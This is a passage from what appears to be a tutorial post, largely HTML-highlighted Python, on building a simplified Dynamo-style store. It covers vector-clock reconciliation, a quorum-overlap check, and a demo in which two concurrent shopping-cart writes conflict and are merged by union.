                    &lt;span class="n"&gt;dominated&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# v1 is an ancestor of v2, discard v1
&lt;/span&gt;
        &lt;span class="n"&gt;survivors&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;dominated&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# De-duplicate: identical clocks from different replicas are the same version
&lt;/span&gt;        &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="n"&gt;unique&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;survivors&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="nf"&gt;any&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;unique&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;seen_clocks&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;unique&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;unique&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
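&lt;p&gt;To see the pruning rule in isolation, here is a minimal, self-contained sketch. The &lt;code&gt;VectorClock&lt;/code&gt; below is a stripped-down stand-in for the class defined earlier in this post, carrying only the &lt;code&gt;dominates&lt;/code&gt; check that reconciliation needs:&lt;/p&gt;

```python
# Standalone sketch of the rule _reconcile applies: a version whose clock
# is dominated by another version's clock is a causal ancestor and carries
# no new information, so it is dropped.
# (This VectorClock is a minimal stand-in, not the full class from the post.)
from dataclasses import dataclass


@dataclass
class VectorClock:
    clock: dict  # node_id -> counter

    def dominates(self, other: "VectorClock") -> bool:
        # self dominates other iff self >= other on every node AND
        # self > other on at least one node (strict causal descent).
        ge_all = all(self.clock.get(n, 0) >= c for n, c in other.clock.items())
        gt_any = any(self.clock.get(n, 0) > other.clock.get(n, 0)
                     for n in self.clock)
        return ge_all and gt_any


def reconcile(clocks: list[VectorClock]) -> list[VectorClock]:
    # Keep only the maximal elements: clocks not dominated by any other.
    return [a for a in clocks
            if not any(b is not a and b.dominates(a) for b in clocks)]


survivors = reconcile([VectorClock({"A": 1}),
                       VectorClock({"A": 2}),
                       VectorClock({"B": 1})])
print(survivors)  # {A:2} and {B:1} survive as concurrent; {A:1} is pruned
```

&lt;p&gt;The survivors are exactly the maximal elements under the causal partial order, which is why a read can legitimately return more than one version.&lt;/p&gt;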



&lt;h3&gt;
  
  
  Part 6: Putting It All Together — A Demo
&lt;/h3&gt;

&lt;p&gt;Let's run through a complete scenario: normal write/read, then a simulated conflict where two nodes diverge and the application must merge them.&lt;br&gt;
&lt;/p&gt;
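&lt;p&gt;Before running it, a quick sanity check on the quorum arithmetic the demo uses (&lt;code&gt;N=3, R=2, W=2&lt;/code&gt;): whenever &lt;code&gt;R + W &amp;gt; N&lt;/code&gt;, every read quorum must overlap every write quorum in at least one replica, so a successful read always sees at least one copy of the latest acknowledged write. A brute-force check over all quorum pairs confirms this:&lt;/p&gt;

```python
# Brute-force verification that R + W > N forces read/write quorum overlap.
# N, R, W here mirror the demo configuration (a choice of this sketch).
from itertools import combinations

N, R, W = 3, 2, 2
replicas = set(range(N))

overlap_always = all(
    set(read_q) & set(write_q)          # at least one shared replica?
    for read_q in combinations(replicas, R)
    for write_q in combinations(replicas, W)
)
print(f"R + W > N: {R + W > N}, all quorum pairs overlap: {overlap_always}")
# → R + W > N: True, all quorum pairs overlap: True
```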

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;demo&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# ── Setup ────────────────────────────────────────────────────────── #
&lt;/span&gt;    &lt;span class="c1"&gt;# Five nodes placed at evenly spaced positions on the hash ring.
&lt;/span&gt;    &lt;span class="c1"&gt;# In a real cluster these would span multiple datacenters.
&lt;/span&gt;    &lt;span class="n"&gt;nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;300&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-C&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-D&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;700&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
        &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-E&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;900&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;dynamo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;SimplifiedDynamo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SCENARIO 1: Normal write and read (no conflict)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Write the initial shopping cart
&lt;/span&gt;    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]})&lt;/span&gt;

    &lt;span class="c1"&gt;# Read it back — should be a clean single version
&lt;/span&gt;    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Read result: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Update the cart, passing the context from our earlier read.
&lt;/span&gt;    &lt;span class="c1"&gt;# The context tells Dynamo "this write builds on top of clock ctx".
&lt;/span&gt;    &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;jacket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;After update: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SCENARIO 2: Simulated conflict — two concurrent writes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;55&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Write the base version
&lt;/span&gt;    &lt;span class="n"&gt;base_ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]})&lt;/span&gt;

    &lt;span class="c1"&gt;# Now simulate a network partition:
&lt;/span&gt;    &lt;span class="c1"&gt;# node-A and node-B can't talk to each other.
&lt;/span&gt;    &lt;span class="c1"&gt;# We model this by writing directly to individual nodes.
&lt;/span&gt;
    &lt;span class="n"&gt;pref_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;pref_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Write 1: customer adds "scarf" via node_1 (e.g., their laptop)
&lt;/span&gt;    &lt;span class="n"&gt;clock_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;scarf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;clock_1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Write 2: customer adds "gloves" via node_2 (e.g., their phone)
&lt;/span&gt;    &lt;span class="c1"&gt;# This write also descends from base_ctx, not from clock_1.
&lt;/span&gt;    &lt;span class="c1"&gt;# Neither write knows about the other → they are concurrent.
&lt;/span&gt;    &lt;span class="n"&gt;clock_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;node_2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;gloves&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]},&lt;/span&gt; &lt;span class="n"&gt;clock_2&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Read — coordinator sees two concurrent versions and surfaces the conflict
&lt;/span&gt;    &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Conflict detected! &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; concurrent versions:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  Version &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Application-level resolution: union merge (Amazon's shopping cart strategy)
&lt;/span&gt;        &lt;span class="c1"&gt;# Merge items: take the union so no addition is lost
&lt;/span&gt;        &lt;span class="n"&gt;all_items&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
